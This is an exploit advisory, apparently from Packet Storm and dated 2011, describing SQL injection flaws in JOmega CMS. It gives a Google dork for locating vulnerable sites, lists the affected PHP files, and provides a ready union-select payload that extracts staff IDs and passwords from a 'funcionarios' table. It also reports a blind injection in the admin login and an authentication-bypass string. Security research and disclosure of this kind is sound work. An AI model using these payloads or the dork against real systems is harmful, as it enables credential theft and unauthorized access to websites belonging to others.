JOmega CMS suffers from multiple remote SQL injection vulnerabilities.
0b23209662d046ea82494c538653f6cc17d2a7dde6822c509b166216fb2e1a25[$] Exploit Title : JOMEGA CMS SQL Injection
[$] Versions Affected : ALL
[$] Date : 10-07-2011
[$] Author : MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : SQL Injection
[$] Google Dork : inurl:"showPG.php?Id="
[$] Vulnerable files:
/showCACedit.php
/showEVedit.php
/showFQedit.php
/showFRedit.php
/showFregedit.php
/showIFedit.php
/showNTedit.php
/showPGedit.php
/showRGedit.php
/showRQedit.php
[$] Exploit
[+] http://[site]/showPG.php?Id=1 <- [SQL INJECTION]
[+] e.g.
http://example.pt/showPG.php?Id=-1'+union+all+select+1,(select+concat(cod_func,0x3a,password)+from+funcionarios)+,0x30,0x30,0x30,0x30,0x30+and+'1'='1
[#] The Admin Panel its vulnerable too.
[$] Vulnerable files:
/gestor/login.php
[$] Exploit
[+] http://[site]/gestor/login.php?cod_func=LOL <- [BLIND SQL INJECTION]
[#] You can also bypass the username field using: ' OR '1'='1
[$] Greetings from PORTUGAL ^^
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed